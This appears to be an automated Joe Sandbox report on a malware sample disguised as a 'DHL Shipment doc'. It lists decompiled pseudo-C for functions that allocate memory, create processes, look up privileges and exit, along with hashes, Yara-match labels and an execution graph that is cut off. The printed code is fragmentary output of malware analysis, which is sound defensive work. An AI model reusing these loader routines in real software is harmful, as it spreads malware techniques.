                              			E004187CB(intOrPtr __eax, void* __edi, intOrPtr _a2, void* _a6, PVOID* _a10, long _a14, long* _a18, long _a22, long _a26) {
				long _t18;

				_push(__edi);
				 *((intOrPtr*)(__edi - 0x1374aad6)) = __eax;
				_t14 = _a2;
				_t5 = _t14 + 0xc60; // 0xca0
				E004191F0(__edi, _a2, _t5,  *((intOrPtr*)(_a2 + 0x10)), 0, 0x30);
				_t18 = NtAllocateVirtualMemory(_a6, _a10, _a14, _a18, _a22, _a26); // executed
				return _t18;
			}




                              0x004187cb
                              0x004187cd
                              0x004187d3
                              0x004187df
                              0x004187e7
                              0x00418809
                              0x0041880d

                              APIs
                              • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193C4,?,00000000,?,00003000,00000040,00000000,00000000,00408B23), ref: 00418809
                              Memory Dump Source
                              • Source File: 00000003.00000002.797281686.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_400000_DHL Shipment doc.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateMemoryVirtual
                              • String ID:
                              • API String ID: 2167126740-0
                              • Opcode ID: fa9595a296a7c1b530e0e5178a9c926aa6abdc6992919f3d8a3cc550fb1eedaf
                              • Instruction ID: 6f81bef43f40118dec1e844ade3b44a3cf3814683958c0aa511ea7938e4bdb01
                              • Opcode Fuzzy Hash: fa9595a296a7c1b530e0e5178a9c926aa6abdc6992919f3d8a3cc550fb1eedaf
                              • Instruction Fuzzy Hash: ABF01CB2200159AFDB14DF89CC95EE777A9FF8C354F158549FE5997241C630E810CBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 004187D0 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 257 4187d0-4187e6 258 4187ec-41880d NtAllocateVirtualMemory 257->258 259 4187e7 call 4191f0 257->259 259->258
                              C-Code - Quality: 100%
                              			E004187D0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E004191F0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                              0x004187df
                              0x004187e7
                              0x00418809
                              0x0041880d

                              APIs
                              • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193C4,?,00000000,?,00003000,00000040,00000000,00000000,00408B23), ref: 00418809
                              Memory Dump Source
                              • Source File: 00000003.00000002.797281686.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_400000_DHL Shipment doc.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateMemoryVirtual
                              • String ID:
                              • API String ID: 2167126740-0
                              • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                              • Instruction ID: 706794cddc655a9f1cf9aa3041d650f47f408424a1237cb237646820d67af729
                              • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                              • Instruction Fuzzy Hash: C6F015B2200208ABDB14DF89CC81EEB77ADAF88754F118149FE0897241C630F810CBA4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00418720 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E00418720(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x409773
				E004191F0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}





                              0x00418723
                              0x00418726
                              0x0041872f
                              0x00418737
                              0x00418745
                              0x00418749

                              APIs
                              • NtClose.NTDLL(00413D60,?,?,00413D60,00408B23,FFFFFFFF), ref: 00418745
                              Memory Dump Source
                              • Source File: 00000003.00000002.797281686.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_400000_DHL Shipment doc.jbxd
                              Yara matches
                              Similarity
                              • API ID: Close
                              • String ID:
                              • API String ID: 3535843008-0
                              • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                              • Instruction ID: 78d7ac03eca040244b58aa8b13355d71f7060bfbe0c396a3df5df4df45d4e392
                              • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                              • Instruction Fuzzy Hash: D4D01776200218BBE710EF99CC89EE77BACEF48760F154499BA189B242C530FA4086E0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 004088E0 Relevance: .1, Instructions: 92COMMON
                              Download Yara Rule
                              C-Code - Quality: 93%
                              			E004088E0(intOrPtr* _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t39;
				void* _t50;
				intOrPtr* _t52;
				void* _t53;
				void* _t54;
				void* _t55;
				void* _t56;

				_t52 = _a4;
				_t39 = 0; // executed
				_t24 = E00406E30(_t52,  &_v24); // executed
				_t54 = _t53 + 8;
				if(_t24 != 0) {
					E00407040( &_v24,  &_v840);
					_t55 = _t54 + 8;
					do {
						E0041A100( &_v284, 0x104);
						E0041A770( &_v284,  &_v804);
						_t56 = _t55 + 0x10;
						_t50 = 0x4f;
						while(1) {
							_t31 = E00413E00(E00413DA0(_t52, _t50),  &_v284);
							_t56 = _t56 + 0x10;
							if(_t31 != 0) {
								break;
							}
							_t50 = _t50 + 1;
							if(_t50 <= 0x62) {
								continue;
							} else {
							}
							goto L8;
						}
						_t9 = _t52 + 0x14; // 0xffffe1a5
						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
						_t39 = 1;
						L8:
						_t33 = E00407070( &_v24,  &_v840);
						_t55 = _t56 + 8;
					} while (_t33 != 0 && _t39 == 0);
					_t34 = E004070F0(_t52,  &_v24); // executed
					if(_t39 == 0) {
						asm("rdtsc");
						asm("rdtsc");
						_v8 = _t34 - 0 + _t34;
						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
					}
					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
					_t20 = _t52 + 0x31; // 0x5608758b
					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
					return 1;
				} else {
					return _t24;
				}
			}



















                              0x004088eb
                              0x004088f3
                              0x004088f5
                              0x004088fa
                              0x004088ff
                              0x00408912
                              0x00408917
                              0x00408920
                              0x0040892c
                              0x0040893f
                              0x00408944
                              0x00408947
                              0x00408950
                              0x00408962
                              0x00408967
                              0x0040896c
                              0x00000000
                              0x00000000
                              0x0040896e
                              0x00408972
                              0x00000000
                              0x00000000
                              0x00408974
                              0x00000000
                              0x00408972
                              0x00408976
                              0x00408979
                              0x0040897f
                              0x00408981
                              0x0040898c
                              0x00408991
                              0x00408994
                              0x004089a1
                              0x004089ac
                              0x004089ae
                              0x004089b4
                              0x004089b8
                              0x004089bb
                              0x004089bb
                              0x004089c2
                              0x004089c5
                              0x004089ca
                              0x004089d7
                              0x00408906
                              0x00408906
                              0x00408906

                              Memory Dump Source
                              • Source File: 00000003.00000002.797281686.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_400000_DHL Shipment doc.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 9486f5e49d764a92f151d77217a9e0cba6cb209ca71685294e9262afbb7a2405
                              • Instruction ID: 226e528ef8d89cf76aa3651449dca84ee2c763c0567bc665b78f2505a73a72ae
                              • Opcode Fuzzy Hash: 9486f5e49d764a92f151d77217a9e0cba6cb209ca71685294e9262afbb7a2405
                              • Instruction Fuzzy Hash: B521F8B2D4420957CB15E6649E42AFF73AC9B50304F04057FE989A2181FA39AB498BA7
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00418970 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42processCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 8 418970-4189c8 call 4191f0 CreateProcessInternalW
                              C-Code - Quality: 37%
                              			E00418970(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, char _a48, intOrPtr _a52) {
				void* _t22;
				void* _t33;
				intOrPtr* _t34;

				_t16 = _a4;
				_t2 = _t16 + 0xa14; // 0x58de852
				_t3 = _t16 + 0xc80; // 0x408929
				_t34 = _t3;
				E004191F0(_t33, _a4, _t34,  *_t2, 0, 0x37);
				_t5 =  &_a48; // 0x407c65
				_t22 =  *((intOrPtr*)( *_t34))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44,  *_t5, _a52); // executed
				return _t22;
			}






                              0x00418973
                              0x00418976
                              0x00418982
                              0x00418982
                              0x0041898a
                              0x00418992
                              0x004189c4
                              0x004189c8

                              APIs
                              • CreateProcessInternalW.KERNELBASE(00407C3D,00407C65,004079FD,00000010,?,00000044,?,?,?,00000044,e|@D,00000010,004079FD,00407C65,00407C3D,00407CA9), ref: 004189C4
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.797281686.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_400000_DHL Shipment doc.jbxd
                              Yara matches
                              Similarity
                              • API ID: CreateInternalProcess
                              • String ID: e|@D
                              • API String ID: 2186235152-4053762965
                              • Opcode ID: a8d03338a5b8e7428a3411fecad22ab56c063a2c8b97b146bea9412fcdabe5ed
                              • Instruction ID: dc55ce413be0313fa40dca0a96025687998fc1323a4b44b9ddea5e3475535afa
                              • Opcode Fuzzy Hash: a8d03338a5b8e7428a3411fecad22ab56c063a2c8b97b146bea9412fcdabe5ed
                              • Instruction Fuzzy Hash: C701AFB2210108BBCB54DF89DC80EEB77ADAF8C754F158258FA0D97241C630E851CBA4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 004188C0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 20 4188c0-4188f1 call 4191f0 RtlAllocateHeap
                              C-Code - Quality: 100%
                              			E004188C0(intOrPtr _a4, char _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				E004191F0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t6 =  &_a8; // 0x413546
				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
				return _t10;
			}





                              0x004188d7
                              0x004188e2
                              0x004188ed
                              0x004188f1

                              APIs
                              • RtlAllocateHeap.NTDLL(F5A,?,00413CBF,00413CBF,?,00413546,?,?,?,?,?,00000000,00408B23,?), ref: 004188ED
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.797281686.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_400000_DHL Shipment doc.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateHeap
                              • String ID: F5A
                              • API String ID: 1279760036-683449296
                              • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                              • Instruction ID: c53d960059fd60d51188ffd50ae561d8054dda033e2458622c390dbd27fda9b7
                              • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                              • Instruction Fuzzy Hash: 61E012B1200208ABDB14EF99CC85EA777ACAF88654F118559FE085B242C630F914CAB0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00407290 Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 218 407290-4072da call 41a150 call 41ad30 call 409b50 call 413e60 227 4072dc-4072ee PostThreadMessageW 218->227 228 40730e-407312 218->228 229 4072f0-40730a call 4092b0 227->229 230 40730d 227->230 229->230 230->228
                              C-Code - Quality: 82%
                              			E00407290(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;

				_t30 = __eflags;
				_v68 = 0;
				E0041A150( &_v67, 0, 0x3f);
				E0041AD30( &_v68, 3);
				_t12 = E00409B50(_t30, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00413E60(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E004092B0(1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}












                              0x00407290
                              0x0040729f
                              0x004072a3
                              0x004072ae
                              0x004072be
                              0x004072ce
                              0x004072d3
                              0x004072da
                              0x004072dd
                              0x004072ea
                              0x004072ee
                              0x0040730b
                              0x0040730b
                              0x00000000
                              0x0040730d
                              0x00407312

                              APIs
                              • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072EA
                              Memory Dump Source
                              • Source File: 00000003.00000002.797281686.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_400000_DHL Shipment doc.jbxd
                              Yara matches
                              Similarity
                              • API ID: MessagePostThread
                              • String ID:
                              • API String ID: 1836367815-0
                              • Opcode ID: c0b1965486bbed21c20c63ece949b1f46c1b03fe5ed161d661499a1b38bcdbd6
                              • Instruction ID: ba3d5bcfed237746ec30380b6ed14dc4a9f69b7da918f5ae44e724b0e7605d49
                              • Opcode Fuzzy Hash: c0b1965486bbed21c20c63ece949b1f46c1b03fe5ed161d661499a1b38bcdbd6
                              • Instruction Fuzzy Hash: 9C01A771A8032876E721B6959C03FFF776C5B00B55F04011AFF04BA2C2E6A8790687FA
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00418A53 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 260 418a53-418a7a call 4191f0 262 418a7f-418a94 LookupPrivilegeValueW 260->262
                              C-Code - Quality: 53%
                              			E00418A53(void* __ebx, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				signed int _t19;
				signed int _t22;

				asm("cli");
				_t19 = _t22 * 0x55;
				_push(_t22);
				_t7 = _a4;
				_push(_t19);
				E004191F0(0x9eec496f, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_t7 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}






                              0x00418a55
                              0x00418a5d
                              0x00418a60
                              0x00418a63
                              0x00418a6c
                              0x00418a7a
                              0x00418a90
                              0x00418a94

                              APIs
                              • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFD2,0040CFD2,00000041,00000000,?,00408B95), ref: 00418A90
                              Memory Dump Source
                              • Source File: 00000003.00000002.797281686.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_400000_DHL Shipment doc.jbxd
                              Yara matches
                              Similarity
                              • API ID: LookupPrivilegeValue
                              • String ID:
                              • API String ID: 3899507212-0
                              • Opcode ID: fcdc5623d7d4368ef8f841a9baa8722fcd9ba901bc83185bf29f41fe2183157f
                              • Instruction ID: 4c9bc1d5122e729ebea0a90768cd22131df67a68825705a4834a12e48285c581
                              • Opcode Fuzzy Hash: fcdc5623d7d4368ef8f841a9baa8722fcd9ba901bc83185bf29f41fe2183157f
                              • Instruction Fuzzy Hash: 11E06DB12003196BD720DF89CC86EDB3769AF84650F018169FD0D6B242C931ED098BE1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00418900 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 263 418900-418931 call 4191f0 RtlFreeHeap
                              C-Code - Quality: 100%
                              			E00418900(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E004191F0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                              0x0041890f
                              0x00418917
                              0x0041892d
                              0x00418931

                              APIs
                              • RtlFreeHeap.NTDLL(00000060,00408B23,?,?,00408B23,00000060,00000000,00000000,?,?,00408B23,?,00000000), ref: 0041892D
                              Memory Dump Source
                              • Source File: 00000003.00000002.797281686.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_400000_DHL Shipment doc.jbxd
                              Yara matches
                              Similarity
                              • API ID: FreeHeap
                              • String ID:
                              • API String ID: 3298025750-0
                              • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                              • Instruction ID: 5f54135a6d5665afae9514b011c4f342711cdf5a633985feeb8d835705c457f1
                              • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                              • Instruction Fuzzy Hash: 98E012B1200208ABDB18EF99CC89EA777ACAF88750F018559FE085B242C630E914CAB0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00418A60 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E00418A60(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E004191F0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}





                              0x00418a7a
                              0x00418a90
                              0x00418a94

                              APIs
                              • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFD2,0040CFD2,00000041,00000000,?,00408B95), ref: 00418A90
                              Memory Dump Source
                              • Source File: 00000003.00000002.797281686.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_400000_DHL Shipment doc.jbxd
                              Yara matches
                              Similarity
                              • API ID: LookupPrivilegeValue
                              • String ID:
                              • API String ID: 3899507212-0
                              • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                              • Instruction ID: b5f2a6165515d53f35f5e56a9475d77ccb8deec25097a7d382054e427d326996
                              • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                              • Instruction Fuzzy Hash: 93E01AB12002086BDB10DF49CC85EE737ADAF88650F018155FE0857242C934E8548BF5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00418940 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E00418940(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E004191F0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}




                              0x00418943
                              0x0041895a
                              0x00418968

                              APIs
                              • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418968
                              Memory Dump Source
                              • Source File: 00000003.00000002.797281686.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_400000_DHL Shipment doc.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitProcess
                              • String ID:
                              • API String ID: 621844428-0
                              • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                              • Instruction ID: 1333b191b135ec901ac61a9cb59cf638980f097d56b5f16c626c7f81ecdb5f9b
                              • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                              • Instruction Fuzzy Hash: 52D012716002187BD620DF99CC85FD7779CDF48750F018065BA1C5B242C531BA00C6E1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00418933 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                              Download Yara Rule
                              C-Code - Quality: 37%
                              			E00418933(intOrPtr _a4, int _a8) {
				void* _t12;

				asm("das");
				asm("ror dword [ebp-0x4f], 0x9f");
				asm("stc");
				_t7 = _a4;
				E004191F0(_t12, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t7 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}




                              0x00418933
                              0x00418939
                              0x0041893d
                              0x00418943
                              0x0041895a
                              0x00418968

                              APIs
                              • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418968
                              Memory Dump Source
                              • Source File: 00000003.00000002.797281686.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_400000_DHL Shipment doc.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitProcess
                              • String ID:
                              • API String ID: 621844428-0
                              • Opcode ID: afc656ac6491a0f145a87c0515414a0bbbd9975d3be51118ec40ae1f2bfbb04f
                              • Instruction ID: 44ce480b178df4900dfd740dccc8e721f533594fb9d6c403b0dcbf16fef5d7df
                              • Opcode Fuzzy Hash: afc656ac6491a0f145a87c0515414a0bbbd9975d3be51118ec40ae1f2bfbb04f
                              • Instruction Fuzzy Hash: 6AE08635600604BBD730DF68CD89FD73B69AF04350F004158B919AB291C130E910CA90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Non-executed Functions

                              Function 00415681 Relevance: .0, Instructions: 31COMMON
                              Download Yara Rule
                              C-Code - Quality: 71%
                              			E00415681(void* __eax, void* __edi, void* __esi) {
				void* _t18;
				signed int _t20;
				intOrPtr _t23;
				void* _t33;
				void* _t43;
				void* _t44;

				asm("lahf");
				_t33 = __eax;
				_t23 =  *((intOrPtr*)(__edi + 0x85b8735));
				_t44 = _t43 - 1;
				_push(_t23);
				if(_t44 != 0) {
					_t4 = _t23 - 0x3f7af33c;
					 *_t4 =  *((intOrPtr*)(_t23 - 0x3f7af33c)) + __edi;
					if( *_t4 == 0) {
						_t27 = __eax + 0x3e60;
						if(E0041A930(__eax + 0x3e60, _t23, __eax + 0x3e60, __esi) != 0 || E0041A930(_t27, _t23, _t33 + 0x3e67, __esi) != 0 || E0041A930(_t27, _t23, _t33 + 0x3e6e, __esi) != 0) {
							goto L3;
						} else {
							_t28 = _t33 + 0x3e75;
							_t18 = E0041A930(_t33 + 0x3e75, _t23, _t33 + 0x3e75, __esi);
							if(_t18 != 0 || E0041A930(_t28, _t23, _t33 + 0x3e7d, __esi) != 0) {
								goto L3;
							} else {
								_t20 = E0041A930(_t28, _t23, _t33 + 0x3e86, __esi);
								asm("sbb eax, eax");
								return  ~( ~_t20);
							}
						}
					} else {
						L3:
						return 1;
					}
				} else {
					 *((intOrPtr*)(_t44 + 0x20212b66)) = ss;
					asm("adc [edx], ecx");
					asm("out 0x3f, eax");
					asm("outsb");
					return __edi;
				}
			}









                              0x00415681
                              0x00415682
                              0x00415684
                              0x0041568a
                              0x0041568b
                              0x0041568c
                              0x004156cf
                              0x004156cf
                              0x004156d5
                              0x004156e2
                              0x004156f4
                              0x00000000
                              0x00415720
                              0x00415721
                              0x00415729
                              0x00415733
                              0x00000000
                              0x0041574a
                              0x00415753
                              0x0041575e
                              0x00415765
                              0x00415765
                              0x00415733
                              0x004156d7
                              0x004156d7
                              0x004156e0
                              0x004156e0
                              0x0041568e
                              0x00415691
                              0x00415697
                              0x00415699
                              0x0041569b
                              0x004156a6
                              0x004156a6

                              Memory Dump Source
                              • Source File: 00000003.00000002.797281686.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_400000_DHL Shipment doc.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 7b15053958ac2fc02262c304ee61d93d11fc6e0924a916ce3b0d5d732bb686b6
                              • Instruction ID: bb8d5a184463f08f70b804306cf8b8beefc058f97955184b5d7a567e9c5c5e27
                              • Opcode Fuzzy Hash: 7b15053958ac2fc02262c304ee61d93d11fc6e0924a916ce3b0d5d732bb686b6
                              • Instruction Fuzzy Hash: 6BE0DF327194044ACB00CD0AB8801E4F3A8DBC622CB0422A3D908CF2229006849742D9
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0040C3AE Relevance: .0, Instructions: 17COMMON
                              Download Yara Rule
                              C-Code - Quality: 58%
                              			E0040C3AE(void* __eax, signed int __ecx, void* __edx, signed int* __esi) {
				signed char _t34;

				_t34 = __ecx &  *__esi;
				 *(_t34 + 0x7d) =  *(_t34 + 0x7d) << 1;
				asm("sbb ebp, [ebx+0x10550810]");
			}




                              0x0040c3ae
                              0x0040c416
                              0x0040c419

                              Memory Dump Source
                              • Source File: 00000003.00000002.797281686.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_400000_DHL Shipment doc.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: ae7c4e92de88f6a0e7dd1b4bb5110e13f5690d94af266aa3010fb92b994c0e74
                              • Instruction ID: 686766b5ba58b8ad42f8f1051e6e90ccd56ce92737d127b85437f2ddae598acb
                              • Opcode Fuzzy Hash: ae7c4e92de88f6a0e7dd1b4bb5110e13f5690d94af266aa3010fb92b994c0e74
                              • Instruction Fuzzy Hash: B7C01216B0C6D442C6157E2868A05B1FBF4E8C3269B6876FBDDD4735839112C021829D
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Execution Graph

                              Execution Coverage:4.7%
                              Dynamic/Decrypted Code Coverage:0%
                              Signature Coverage:0%
                              Total number of Nodes:697
                              Total number of Limit Nodes:82
                              execution_graph 31044 4d49540 LdrInitializeThunk 31045 ead4cd 31048 ea9c90 31045->31048 31049 ea9cb6 31048->31049 31056 e98b70 31049->31056 31051 ea9cc2 31054 ea9ce6 31051->31054 31064 e97e50 31051->31064 31096 ea8940 31054->31096 31099 e98ac0 31056->31099 31058 e98b7d 31059 e98b84 31058->31059 31111 e98a60 31058->31111 31059->31051 31065 e97e77 31064->31065 31528 e9a020 31065->31528 31067 e97e89 31532 e99d70 31067->31532 31069 e97ea6 31076 e97ead 31069->31076 31583 e99ca0 LdrLoadDll 31069->31583 31071 e97ff4 31071->31054 31073 e97f16 31073->31071 31074 eaa280 LdrLoadDll 31073->31074 31075 e97f2c 31074->31075 31077 eaa280 LdrLoadDll 31075->31077 31076->31071 31536 e9d180 31076->31536 31078 e97f3d 31077->31078 31079 eaa280 LdrLoadDll 31078->31079 31080 e97f4e 31079->31080 31548 e9aee0 31080->31548 31082 e97f61 31083 ea3a60 8 API calls 31082->31083 31084 e97f72 31083->31084 31085 ea3a60 8 API calls 31084->31085 31086 e97f83 31085->31086 31087 e97fa3 31086->31087 31560 e9ba50 31086->31560 31089 ea3a60 8 API calls 31087->31089 31095 e97feb 31087->31095 31091 e97fba 31089->31091 31091->31095 31585 e9baf0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 31091->31585 31566 e97c80 31095->31566 31097 ea91f0 LdrLoadDll 31096->31097 31098 ea895f 31097->31098 31130 ea6e60 31099->31130 31103 e98ae6 31103->31058 31104 e98adc 31104->31103 31137 ea9540 31104->31137 31106 e98b23 31106->31103 31148 e988e0 31106->31148 31108 e98b43 31154 e98330 LdrLoadDll 31108->31154 31110 e98b55 31110->31058 31503 ea9830 31111->31503 31114 ea9830 LdrLoadDll 31115 e98a8b 31114->31115 31116 ea9830 LdrLoadDll 31115->31116 31117 e98aa1 31116->31117 31118 e9cf80 31117->31118 31119 e9cf99 31118->31119 31511 e99ea0 31119->31511 31121 e9cfac 31515 ea8470 31121->31515 31125 e9cfd2 31126 e9cffd 31125->31126 31521 